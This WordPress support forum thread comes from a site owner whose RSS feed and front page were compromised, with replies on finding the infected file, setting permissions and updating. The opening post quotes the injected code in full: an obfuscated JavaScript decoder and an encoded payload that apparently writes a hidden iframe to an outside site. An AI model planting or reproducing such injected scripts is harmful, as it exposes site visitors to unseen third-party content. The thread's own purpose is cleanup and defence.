Support » Fixing WordPress » Repairing a hackers addition to RSS feed.

  • Recently I noticed that my RSS feeds were corrupting. Looking into the feed and using Feedburners validator, I noticed a spam element had been added to the very end of the RSS feed. (And example is noted below.) When I uninstalled, and re-installed all the posts, the problem when away, only to reappear the next day.

    I’m working to boost security to the site, but need to know what file I might look for, to eliminate this from the RSS feed.

    Example code from my RSS feed:
    “# </rss>
    # <!– ~ –><script language=javascript>document.write(unescape(‘%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%264Dtdsjqu%2631mbohvbhf%264Ekbwbtdsjqu%264F%261E%261Bepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00xxx/gsff31/dpn0qpsubm0joefy/qiq%264Gbgg%264Esb%7Bfdd%2638%2631xjeui%264E%26381%2638%2631ifjhiu%264E%26381%2638%2631gsbnfcpsefs%264E%26381%2638%264F%264D0jgsbnf%264F%2633%263%3A%261E%261B%264D0tdsjqu%264F1’)</script><!– ~ –>”

Viewing 3 replies - 1 through 3 (of 3 total)
  • whooami



    thats not just in your feed; view your source on the front page of your site.

    Start by checking your current theme’s footer.php for the javascript.

    If its not in there, check all the other files.

    … boost security ..
    1. In the future, you want to insure your files have safe and sane permissions:

    directories: 755
    files: 644

    2. Pay attention to your site.

    3. Stay on top of updates. You are presently using 2.2.2 — thats not current.




    After looking closer – you are using frames..

    This is WP generated:

    and there is no javascript.,com_frontpage/Itemid,1/

    That is your front page, and clearly has the js at the bottom.

    What this suggests is that whatever you are using for your “portal” is where the problem lies.

    This post helped solve my problem too—and I’m going to now make sure all of our permissions are set correctly.

    Just to make sure I understand this: I’ll set every directory (folder) to 755. I’ll set every individual file to 644.

    Are there any exceptions? For example, are there typically plugins that need to have looser permissions? And if so, does that mean setting the plugin folder itself and the wp-content folder to those same permissions?



Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Repairing a hackers addition to RSS feed.’ is closed to new replies.